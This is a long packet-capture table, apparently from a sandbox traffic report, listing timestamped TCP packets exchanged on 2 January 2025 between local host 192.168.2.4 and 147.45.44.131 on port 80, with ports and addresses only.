Jan 2, 2025 19:13:04.771440983 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771449089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771457911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771475077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771481991 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771481991 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771481991 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771485090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771500111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771512032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771521091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771529913 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771529913 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771533012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771543026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771543980 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771553993 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771578074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771578074 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771586895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771595955 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771605968 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771620035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771620035 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771636963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771646023 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771646023 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771652937 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771661997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771670103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771680117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771694899 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771696091 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771704912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771717072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771725893 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771743059 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771743059 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771743059 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771760941 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771770000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771776915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771785975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771797895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771805048 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771838903 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771838903 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771843910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771852970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771861076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771871090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771881104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.771954060 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.771954060 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.772425890 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.772434950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.772444010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.772481918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.772481918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.772483110 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.772490978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.772500038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.772507906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.772516966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.772564888 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.772564888 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.774570942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.774580002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.774589062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.774615049 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.774631977 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.774637938 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.774647951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.774657965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.774666071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.774677992 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.774682999 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.774705887 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.776611090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.776619911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.776628971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.776642084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.776652098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.776659966 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.776663065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.776674986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.776678085 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.776678085 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.776686907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.776705980 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777579069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777646065 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777666092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777674913 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777683020 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777700901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777710915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777720928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777734041 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777740002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777750015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777760983 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777765989 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777765989 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777771950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777796984 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777807951 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777822018 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777834892 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777851105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777863026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777872086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777872086 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777879953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777896881 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777899027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777910948 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777913094 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777920961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777931929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777941942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777942896 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777951002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777962923 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.777975082 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.777995110 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.872920036 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.872931004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.872946978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.872957945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.872961044 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.872975111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.872984886 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.872997999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.872999907 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873008966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873012066 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873016119 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873020887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873032093 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873042107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873053074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873064995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873084068 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873090029 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873105049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873116016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873151064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873156071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873164892 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873174906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873183966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873207092 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873236895 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873239040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873251915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873261929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873277903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873282909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873290062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873316050 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873375893 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873384953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873394966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873409986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873415947 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873420000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873431921 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873436928 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873442888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873455048 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873460054 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873469114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873471022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873481035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873490095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873501062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873507977 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873512030 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873523951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873528957 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873536110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873538971 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873553038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873565912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873568058 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873574972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873584986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873595953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873605967 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873606920 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873625040 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873647928 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873676062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873686075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873697996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873708963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873719931 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873720884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873730898 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873744011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873744965 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873754978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873763084 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873765945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873775959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873792887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873795986 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873802900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873815060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873816967 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873823881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873835087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873847008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873848915 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873858929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873871088 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873872995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873883963 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873884916 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873898983 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873899937 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873909950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873919010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873929977 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873930931 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873941898 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873950958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873959064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873970032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873980045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.873981953 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.873991966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874003887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874006033 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874015093 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874027014 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874027014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874049902 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874054909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874064922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874073982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874083042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874095917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874098063 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874105930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874118090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874119043 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874138117 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874144077 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874181986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874200106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874209881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874218941 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874231100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874238014 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874241114 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874258995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874259949 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874269009 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.874272108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874283075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.874301910 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875488043 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875499964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875509977 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875530958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875551939 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875555992 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875565052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875575066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875583887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875595093 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875608921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875631094 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875677109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875685930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875699997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875710964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875720978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875730038 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875731945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875744104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875747919 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875756025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875760078 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875766039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875777006 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875786066 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875787973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875797987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875808954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875818968 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875818968 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875828028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875838041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875848055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.875854969 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875870943 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.875890970 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.959681988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959696054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959712029 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959723949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959736109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.959760904 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.959788084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959799051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959810019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959825039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959845066 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.959871054 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.959875107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959887028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959897041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959917068 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.959961891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959973097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.959981918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960000038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960005999 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960011959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960027933 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960031033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960040092 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960048914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960058928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960071087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960081100 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960083008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960094929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960105896 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960107088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960117102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960129023 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960129023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960140944 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960143089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960171938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960184097 CET	80	49731	147.45.44.131	192.168.2.4
